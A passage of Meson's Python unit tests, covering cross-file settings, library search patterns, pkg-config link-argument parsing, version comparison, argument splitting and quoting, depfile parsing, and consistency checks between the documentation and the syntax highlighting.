# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Many outputs, can't use @OUTPUT@ like this
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
def test_needs_exe_wrapper_override(self):
config = ConfigParser()
config['binaries'] = {
'c': '\'/usr/bin/gcc\'',
}
config['host_machine'] = {
'system': '\'linux\'',
'cpu_family': '\'arm\'',
'cpu': '\'armv7\'',
'endian': '\'little\'',
}
# Cannot be used as a context manager because we need to open the
# file a second time, and that is not possible on Windows while it
# is still open.
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.flush()
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
detected_value = env.need_exe_wrapper()
os.unlink(configfilename)
desired_value = not detected_value
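# Whatever need_exe_wrapper() auto-detected above, write a cross file that
# forces the opposite via the [properties] section and check that the
# explicit needs_exe_wrapper setting wins over the detection.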
config['properties'] = {
'needs_exe_wrapper': 'true' if desired_value else 'false'
}
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
forced_value = env.need_exe_wrapper()
os.unlink(configfilename)
self.assertEqual(forced_value, desired_value)
def test_listify(self):
listify = mesonbuild.mesonlib.listify
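# As the assertions below suggest, listify wraps scalars in a list and (by
# default) flattens nested lists; with unholder=True it also replaces
# ObjectHolder instances with their held objects, e.g. (illustrative):
#   listify(1)              # -> [1]
#   listify([1, [2, [3]]])  # -> [1, 2, 3]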
# Test sanity
self.assertEqual([1], listify(1))
self.assertEqual([], listify([]))
self.assertEqual([1], listify([1]))
# Test flattening
self.assertEqual([1, 2, 3], listify([1, [2, 3]]))
self.assertEqual([1, 2, 3], listify([1, [2, [3]]]))
self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
# Test flattening and unholdering
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
self.assertEqual([holder1], listify(holder1))
self.assertEqual([holder1], listify([holder1]))
self.assertEqual([holder1, 2], listify([holder1, 2]))
self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]]))
self.assertEqual([1], listify(holder1, unholder=True))
self.assertEqual([1], listify([holder1], unholder=True))
self.assertEqual([1, 2], listify([holder1, 2], unholder=True))
self.assertEqual([1, 2, 3], listify([holder1, 2, [holder3]], unholder=True))
# Unholding doesn't work recursively when not flattening
self.assertEqual([1, [2], [holder3]], listify([holder1, [2], [holder3]], unholder=True, flatten=False))
def test_extract_as_list(self):
extract = mesonbuild.mesonlib.extract_as_list
# Test sanity
kwargs = {'sources': [1, 2, 3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
self.assertEqual(kwargs, {'sources': [1, 2, 3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
self.assertEqual(kwargs, {})
# Test unholding
holder3 = ObjectHolder(3)
kwargs = {'sources': [1, 2, holder3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', unholder=True))
self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', unholder=True, pop=True))
self.assertEqual(kwargs, {})
# Test listification
kwargs = {'sources': [1, 2, 3], 'pch_sources': [4, 5, 6]}
self.assertEqual([[1, 2, 3], [4, 5, 6]], extract(kwargs, 'sources', 'pch_sources'))
def test_pkgconfig_module(self):
class Mock:
pass
mock = Mock()
mock.pcdep = Mock()
mock.pcdep.name = "some_name"
mock.version_reqs = []
# pkgconfig dependency as lib
deps = mesonbuild.modules.pkgconfig.DependenciesHelper("thislib")
deps.add_pub_libs([mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
# pkgconfig dependency as requires
deps = mesonbuild.modules.pkgconfig.DependenciesHelper("thislib")
deps.add_pub_reqs([mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
shr = patterns[platform]['shared']
stc = patterns[platform]['static']
shrstc = shr + tuple([x for x in stc if x not in shr])
stcshr = stc + tuple([x for x in shr if x not in stc])
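# The "prefer" orderings are built by appending the other set's patterns
# that are not already present, so PREFER_STATIC tries static names first
# and then falls back to shared ones (and vice versa for PREFER_SHARED).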
p = cc.get_library_naming(env, LibType.SHARED)
self.assertEqual(p, shr)
p = cc.get_library_naming(env, LibType.STATIC)
self.assertEqual(p, stc)
p = cc.get_library_naming(env, LibType.PREFER_STATIC)
self.assertEqual(p, stcshr)
p = cc.get_library_naming(env, LibType.PREFER_SHARED)
self.assertEqual(p, shrstc)
# Test find_library by mocking up OpenBSD versioned shared libraries
if platform != 'openbsd':
return
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
f.write('')
found = cc.find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
def test_find_library_patterns(self):
'''
Unit test for the library search patterns used by find_library()
'''
unix_static = ('lib{}.a', '{}.a')
msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
# This is the priority-ordered list of filename patterns used when searching for libraries
patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
'static': unix_static},
'linux': {'shared': ('lib{}.so', '{}.so'),
'static': unix_static},
'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
'static': unix_static},
'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
'lib{}.dll.a', '{}.dll', '{}.dll.a'),
'static': ('cyg{}.a',) + unix_static},
'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
'static': msvc_static},
'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
'{}.dll.a', '{}.lib', '{}.dll'),
'static': msvc_static}}
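# Note: the OpenBSD 'shared' patterns include versioned suffixes such as
# lib{}.so.[0-9]*.[0-9]*, which is what the versioned-library search in
# _test_all_naming above relies on (it expects libfoo.so.54.0 to win).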
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if is_osx():
self._test_all_naming(cc, env, patterns, 'darwin')
elif is_cygwin():
self._test_all_naming(cc, env, patterns, 'cygwin')
elif is_windows():
if cc.get_argument_syntax() == 'msvc':
self._test_all_naming(cc, env, patterns, 'windows-msvc')
else:
self._test_all_naming(cc, env, patterns, 'windows-mingw')
elif is_openbsd():
self._test_all_naming(cc, env, patterns, 'openbsd')
else:
self._test_all_naming(cc, env, patterns, 'linux')
env.machines.host.system = 'openbsd'
self._test_all_naming(cc, env, patterns, 'openbsd')
env.machines.host.system = 'darwin'
self._test_all_naming(cc, env, patterns, 'darwin')
env.machines.host.system = 'cygwin'
self._test_all_naming(cc, env, patterns, 'cygwin')
env.machines.host.system = 'windows'
self._test_all_naming(cc, env, patterns, 'windows-mingw')
def test_pkgconfig_parse_libs(self):
'''
Unit test for parsing of pkg-config output to search for libraries
https://github.com/mesonbuild/meson/issues/3951
'''
def create_static_lib(name):
if not is_osx():
name.open('w').close()
return
src = name.with_suffix('.c')
out = name.with_suffix('.o')
with src.open('w') as f:
f.write('int meson_foobar (void) { return 0; }')
subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
subprocess.check_call(['ar', 'csr', str(name), str(out)])
with tempfile.TemporaryDirectory() as tmpdir:
pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
env = get_fake_env()
compiler = env.detect_c_compiler(MachineChoice.HOST)
env.coredata.compilers.host = {'c': compiler}
env.coredata.compiler_options.host['c_link_args'] = FakeCompilerOptions()
p1 = Path(tmpdir) / '1'
p2 = Path(tmpdir) / '2'
p1.mkdir()
p2.mkdir()
# libfoo.a is in one prefix
create_static_lib(p1 / 'libfoo.a')
# libbar.a is in both prefixes
create_static_lib(p1 / 'libbar.a')
create_static_lib(p2 / 'libbar.a')
# Ensure that we never statically link to these
create_static_lib(p1 / 'libpthread.a')
create_static_lib(p1 / 'libm.a')
create_static_lib(p1 / 'libc.a')
create_static_lib(p1 / 'libdl.a')
create_static_lib(p1 / 'librt.a')
def fake_call_pkgbin(self, args, env=None):
if '--libs' not in args:
return 0, '', ''
if args[0] == 'foo':
return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), ''
if args[0] == 'bar':
return 0, '-L{} -lbar'.format(p2.as_posix()), ''
if args[0] == 'internal':
return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), ''
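# The fake above mimics `pkg-config --libs <name>`: it returns a
# (returncode, stdout, stderr) tuple with hand-picked -L/-l flags, so the
# test controls exactly which prefixes and libraries are reported.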
old_call = PkgConfigDependency._call_pkgbin
old_check = PkgConfigDependency.check_pkgconfig
PkgConfigDependency._call_pkgbin = fake_call_pkgbin
PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
# Test begins
try:
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('foo', env, kwargs)
self.assertEqual(foo_dep.get_link_args(),
[(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
bar_dep = PkgConfigDependency('bar', env, kwargs)
self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
internal_dep = PkgConfigDependency('internal', env, kwargs)
if compiler.get_argument_syntax() == 'msvc':
self.assertEqual(internal_dep.get_link_args(), [])
else:
link_args = internal_dep.get_link_args()
for link_arg in link_args:
for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args)
finally:
# Test ends
PkgConfigDependency._call_pkgbin = old_call
PkgConfigDependency.check_pkgconfig = old_check
# Reset dependency class to ensure that in-process configure doesn't mess up
PkgConfigDependency.pkgbin_cache = {}
PkgConfigDependency.class_pkgbin = PerMachine(None, None)
def test_version_compare(self):
comparefunc = mesonbuild.mesonlib.version_compare_many
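# version_compare_many appears to accept one or more constraints and to
# return a tuple whose first element is True when all of them are
# satisfied; only that boolean is checked here.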
for (a, b, result) in [
('0.99.beta19', '>= 0.99.beta14', True),
]:
self.assertEqual(comparefunc(a, b)[0], result)
for (a, b, op) in [
# examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
("1.0010", "1.9", operator.gt),
("1.05", "1.5", operator.eq),
("1.0", "1", operator.gt),
("2.50", "2.5", operator.gt),
("fc4", "fc.4", operator.eq),
("FC5", "fc4", operator.lt),
("2a", "2.0", operator.lt),
("1.0", "1.fc4", operator.gt),
("3.0.0_fc", "3.0.0.fc", operator.eq),
# from RPM tests
("1.0", "1.0", operator.eq),
("1.0", "2.0", operator.lt),
("2.0", "1.0", operator.gt),
("2.0.1", "2.0.1", operator.eq),
("2.0", "2.0.1", operator.lt),
("2.0.1", "2.0", operator.gt),
("2.0.1a", "2.0.1a", operator.eq),
("2.0.1a", "2.0.1", operator.gt),
("2.0.1", "2.0.1a", operator.lt),
("5.5p1", "5.5p1", operator.eq),
("5.5p1", "5.5p2", operator.lt),
("5.5p2", "5.5p1", operator.gt),
("5.5p10", "5.5p10", operator.eq),
("5.5p1", "5.5p10", operator.lt),
("5.5p10", "5.5p1", operator.gt),
("10xyz", "10.1xyz", operator.lt),
("10.1xyz", "10xyz", operator.gt),
("xyz10", "xyz10", operator.eq),
("xyz10", "xyz10.1", operator.lt),
("xyz10.1", "xyz10", operator.gt),
("xyz.4", "xyz.4", operator.eq),
("xyz.4", "8", operator.lt),
("8", "xyz.4", operator.gt),
("xyz.4", "2", operator.lt),
("2", "xyz.4", operator.gt),
("5.5p2", "5.6p1", operator.lt),
("5.6p1", "5.5p2", operator.gt),
("5.6p1", "6.5p1", operator.lt),
("6.5p1", "5.6p1", operator.gt),
("6.0.rc1", "6.0", operator.gt),
("6.0", "6.0.rc1", operator.lt),
("10b2", "10a1", operator.gt),
("10a2", "10b2", operator.lt),
("1.0aa", "1.0aa", operator.eq),
("1.0a", "1.0aa", operator.lt),
("1.0aa", "1.0a", operator.gt),
("10.0001", "10.0001", operator.eq),
("10.0001", "10.1", operator.eq),
("10.1", "10.0001", operator.eq),
("10.0001", "10.0039", operator.lt),
("10.0039", "10.0001", operator.gt),
("4.999.9", "5.0", operator.lt),
("5.0", "4.999.9", operator.gt),
("20101121", "20101121", operator.eq),
("20101121", "20101122", operator.lt),
("20101122", "20101121", operator.gt),
("2_0", "2_0", operator.eq),
("2.0", "2_0", operator.eq),
("2_0", "2.0", operator.eq),
("a", "a", operator.eq),
("a+", "a+", operator.eq),
("a+", "a_", operator.eq),
("a_", "a+", operator.eq),
("+a", "+a", operator.eq),
("+a", "_a", operator.eq),
("_a", "+a", operator.eq),
("+_", "+_", operator.eq),
("_+", "+_", operator.eq),
("_+", "_+", operator.eq),
("+", "_", operator.eq),
("_", "+", operator.eq),
# other tests
('0.99.beta19', '0.99.beta14', operator.gt),
("1.0.0", "2.0.0", operator.lt),
(".0.0", "2.0.0", operator.lt),
("alpha", "beta", operator.lt),
("1.0", "1.0.0", operator.lt),
("2.456", "2.1000", operator.lt),
("2.1000", "3.111", operator.lt),
("2.001", "2.1", operator.eq),
("2.34", "2.34", operator.eq),
("6.1.2", "6.3.8", operator.lt),
("1.7.3.0", "2.0.0", operator.lt),
("2.24.51", "2.25", operator.lt),
("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
("3.4.1", "3.4b1", operator.gt),
("041206", "200090325", operator.lt),
("0.6.2+git20130413", "0.6.2", operator.gt),
("2.6.0+bzr6602", "2.6.0", operator.gt),
("2.6.0", "2.6b2", operator.gt),
("2.6.0+bzr6602", "2.6b2x", operator.gt),
("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
("15.8b", "15.8.0.1", operator.lt),
("1.2rc1", "1.2.0", operator.lt),
]:
ver_a = Version(a)
ver_b = Version(b)
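# For each expected ordering, also check the operators it implies: equality
# implies >= and <=, "less than" implies <= and !=, and "greater than"
# implies >= and !=; for lt and gt the opposite comparisons must be False.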
if op is operator.eq:
for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.lt:
for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.gt:
for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
def test_msvc_toolset_version(self):
'''
Ensure that the toolset version returns the correct value for this MSVC
'''
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
toolset_ver = cc.get_toolset_version()
self.assertIsNotNone(toolset_ver)
# Visual Studio 2015 and older versions do not define VCToolsVersion
# TODO: ICL doesn't set this in the VS2015 profile either
if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
return
if 'VCToolsVersion' in os.environ:
vctools_ver = os.environ['VCToolsVersion']
else:
self.assertIn('VCINSTALLDIR', os.environ)
# See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
self.assertTrue(vctools_ver.startswith(toolset_ver),
msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
def test_split_args(self):
split_args = mesonbuild.mesonlib.split_args
join_args = mesonbuild.mesonlib.join_args
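# Each entry below is (command line, expected split, roundtrip): when
# roundtrip is True, join_args(expected) is additionally required to
# reproduce the original command line exactly.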
if is_windows():
test_data = [
# examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
(r'"a b c" d e', ['a b c', 'd', 'e'], True),
(r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
(r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
(r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
(r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
# other basics
(r'""', [''], True),
(r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
(r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
(r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
(r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
# more illustrative tests
(r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
(r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
(r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
(r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
(r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
(r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
(r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
(r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
(r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
(r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
(r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
(r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
]
else:
test_data = [
(r"'a b c' d e", ['a b c', 'd', 'e'], True),
(r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
(r"a\b\c d e", [r'abc', 'd', 'e'], False),
(r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
(r'"a b c" d e', ['a b c', 'd', 'e'], False),
(r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
(r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
(r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
(r"'a & b & c d e'", ['a & b & c d e'], True),
(r"abd'e f'g h", [r'abde fg', 'h'], False),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
]
for (cmd, expected, roundtrip) in test_data:
self.assertEqual(split_args(cmd), expected)
if roundtrip:
self.assertEqual(join_args(expected), cmd)
def test_quote_arg(self):
split_args = mesonbuild.mesonlib.split_args
quote_arg = mesonbuild.mesonlib.quote_arg
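# Each entry is (raw argument, expected quoted form); quoting must also
# round-trip, i.e. split_args(expected)[0] has to give back the raw
# argument.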
if is_windows():
test_data = [
('', '""'),
('arg1', 'arg1'),
('/option1', '/option1'),
('/Ovalue', '/Ovalue'),
('/OBob&Alice', '/OBob&Alice'),
('/Ovalue with spaces', r'"/Ovalue with spaces"'),
(r'/O"value with spaces"', r'"/O\"value with spaces\""'),
(r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
(r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
]
else:
test_data = [
('arg1', 'arg1'),
('--option1', '--option1'),
('-O=value', '-O=value'),
('-O=Bob&Alice', "'-O=Bob&Alice'"),
('-O=value with spaces', "'-O=value with spaces'"),
('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
]
for (arg, expected) in test_data:
self.assertEqual(quote_arg(arg), expected)
self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
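# Each entry is (depfile lines, target, expected transitive dependencies).
# The cases below also exercise Make-style escaping as understood by
# DepFile: "\ " for a space in a path, "\\" for a literal backslash,
# "$$" for a literal dollar sign, plus dependency cycles.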
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
# line continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(deps, expdeps)
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
def test_snippets(self):
hashcounter = re.compile('^ *(#)+')
snippet_dir = Path('docs/markdown/snippets')
self.assertTrue(snippet_dir.is_dir())
for f in snippet_dir.glob('*'):
self.assertTrue(f.is_file())
if f.parts[-1].endswith('~'):
continue
if f.suffix == '.md':
in_code_block = False
with f.open() as snippet:
for line in snippet:
if line.startswith(' '):
continue
if line.startswith('```'):
in_code_block = not in_code_block
if in_code_block:
continue
m = re.match(hashcounter, line)
if m:
self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
self.assertFalse(in_code_block, 'Unclosed code block.')
else:
if f.name != 'add_release_note_snippets_here':
self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)
def test_compiler_options_documented(self):
'''
Test that C and C++ compiler options and base options are documented in
Builtin-options.md. Only tests the default compiler for the current
platform on the CI.
'''
md = None
with open('docs/markdown/Builtin-options.md') as f:
md = f.read()
self.assertIsNotNone(md)
env = get_fake_env()
# FIXME: Support other compilers
cc = env.detect_c_compiler(MachineChoice.HOST)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
for comp in (cc, cpp):
for opt in comp.get_options().keys():
self.assertIn(opt, md)
for opt in comp.base_options:
self.assertIn(opt, md)
self.assertNotIn('b_unknown', md)
def test_builtin_options_documented(self):
'''
Test that universal options and base options are documented in
Builtin-options.md.
'''
md = None
with open('docs/markdown/Builtin-options.md') as f:
md = f.read()
self.assertIsNotNone(md)
found_entries = set()
sections = list(re.finditer(r"^## (.+)$", md, re.MULTILINE)) + [None]
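# Appending None as a sentinel lets zip(sections, sections[1:]) pair each
# "## ..." heading with the following one (or None for the last), so the
# text of a section can be sliced out of the markdown between the two.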
for s1, s2 in zip(sections[:], sections[1:]):
if s1.group(1) == "Universal options":
# Extract the content for this section
end = s2.start() if s2 is not None else len(md)
content = md[s1.end():end]
subsections = list(re.finditer(r"^### (.+)$", content, re.MULTILINE)) + [None]
for sub1, sub2 in zip(subsections[:], subsections[1:]):
if sub1.group(1) == "Directories" or sub1.group(1) == "Core options":
# Extract the content for this subsection
sub_end = sub2.start() if sub2 is not None else len(content)
subcontent = content[sub1.end():sub_end]
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) .* \|", subcontent, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(len(found_entries & arches), 0)
found_entries |= arches
break
self.assertEqual(found_entries, set([
*mesonbuild.coredata.builtin_options.keys(),
*mesonbuild.coredata.builtin_options_per_machine.keys()
]))
def test_cpu_families_documented(self):
with open("docs/markdown/Reference-tables.md") as f:
md = f.read()
self.assertIsNotNone(md)
sections = list(re.finditer(r"^## (.+)$", md, re.MULTILINE))
for s1, s2 in zip(sections[::2], sections[1::2]):
if s1.group(1) == "CPU families":
# Extract the content for this section
content = md[s1.end():s2.start()]
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
def test_markdown_files_in_sitemap(self):
'''
Test that each markdown file in docs/markdown is referenced in sitemap.txt
'''
with open("docs/sitemap.txt") as f:
md = f.read()
self.assertIsNotNone(md)
toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
exceptions = ['_Sidebar.md']
for f in markdownfiles:
if f not in exceptions:
self.assertIn(f, toc)
def test_vim_syntax_highlighting(self):
'''
Ensure that vim syntax highlighting files were updated for new
functions in the global namespace in build files.
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
defined = set([a.strip() for a in res.group().split('\\')][1:])
self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))
@unittest.skipIf(is_pull(), 'Skipping because this is a pull request')
def test_json_grammar_syntax_highlighting(self):
'''
Ensure that the syntax highlighting JSON grammar written by TingPing was
updated for new functions in the global namespace in build files.
https://github.com/TingPing/language-meson/
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
url = 'https://raw.githubusercontent.com/TingPing/language-meson/master/grammars/meson.json'
try:
# Use a timeout to avoid blocking forever in case the network is
# slow or unavailable in a weird way
r = urllib.request.urlopen(url, timeout=URLOPEN_TIMEOUT)
except urllib.error.URLError as e:
# Skip test when network is not available, such as during packaging
# by a distro or Flatpak
if not isinstance(e, urllib.error.HTTPError):
raise unittest.SkipTest('Network unavailable')
# Don't fail the test if github is down, but do fail if 4xx
if e.code >= 500:
raise unittest.SkipTest('Server error ' + str(e.code))
raise e
# On Python 3.5, we must decode bytes to string. Newer versions don't require that.
grammar = json.loads(r.read().decode('utf-8', 'surrogatepass'))
for each in grammar['patterns']:
if 'name' in each and each['name'] == 'support.function.builtin.meson':
# The string is of the form: (?x)\\b(func1|func2|...\n)\\b\\s*(?=\\() and
# we convert that to [func1, func2, ...] without using regex to parse regex
funcs = set(each['match'].split('\\b(')[1].split('\n')[0].split('|'))
if 'name' in each and each['name'] == 'support.variable.meson':
# \\b(builtin1|builtin2...)\\b
